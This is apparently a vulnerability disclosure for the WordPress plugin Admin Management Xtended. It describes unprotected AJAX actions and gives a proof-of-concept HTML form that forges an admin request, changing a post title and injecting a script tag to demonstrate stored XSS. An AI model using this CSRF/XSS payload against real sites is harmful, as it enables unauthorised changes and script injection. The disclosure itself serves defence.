Admin Management Xtended [CSRF]

Admin Management Xtended plugin suffers for a CSRF vulnerability.

Plugin doesn’t implement security checks to avoid CSRF attacks for any of registered AJAX actions. This could allow malicious site to trick a user of the infected website with administrative rights, in order to perform these actions with arbitrary data.

This actions include:

  • Change post/page title
  • Change post/page slug
  • Toggle comment status (open/closed) for specific posts/pages
  • Change media description
  • Change post/page/link visibility

There are many more actions that are vulnerable to this attack. The ones listed in this report only, could easily lead to a series of different types of attack such as Persistent XSS, Sensitive Data Exposure etc.

PoC

The following form will perform a POST request to the vulnerable website and update the title of the post with id 1 injecting JS code to the title. For this to work a logged in user with administrative rights is required to submit the form.

<h1>Admin Management Xtended - CSRF</h1>
<p>
    The form is misleading and actually it performs a request to update a specific post title.
    The new title will have injected JS code just to demonstrate how this issue could lead to an XSS attack.
</p>
<form method="post" action="http://wp1.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="ame_save_title">
    <!--This field actually expresses the post id-->
    <input type="hidden" name="category_id" value="1">
    <input type="hidden" name="new_title" value="Old Title<script>alert('XSS')</script>">
    <button type="submit" value="Push Me">Push Me</button>
</form>


WordPress Plugins CSRF
INFO